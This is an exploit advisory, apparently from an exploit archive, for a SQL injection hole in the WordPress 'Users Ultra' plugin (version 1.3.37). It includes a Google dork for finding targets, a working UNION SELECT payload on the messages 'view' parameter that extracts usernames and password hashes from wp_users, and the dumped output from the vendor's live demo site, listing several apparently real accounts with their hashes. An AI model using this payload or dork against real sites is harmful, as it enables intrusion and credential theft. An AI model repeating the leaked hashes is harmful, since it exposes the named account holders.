#################################################################################################
# Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability
# Risk : High+/Critical
# Author : XroGuE
# Google Dork : inurl: wp-content/plugins/users-ultra/
# Plugin Version : 1.3.37
# Plugin Name : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home : http://www.usersultra.com/
# Date : 2014/09/27
# Tested on : Win7 - Linux
##################################################################################################
# Description:
# This vulnerability is present in both versions of this plugin (Free & Pro).
# You need to log in as a member and send or receive a message to obtain a message ID to inject into.
# The vendor demo has this vulnerability; check it at this link: http://usersultra.com/uultra-testing/
#
# PoC :
#
# http://localhost/wp/?page_id=117&module=messages&view=[id]
#
# Proof :
#
# http://www.aparat.com/v/vNI81
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/
#
##################################################################################################
#
# Demo :
#
# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1
#
#
# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: 
admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1 # ################################################################################################## # # Discovered By : XroGuE # Website : http://www.Att4ck3r.ir # E-Mail : info[at]att4ck3r[Dot]ir # ##################################################################################################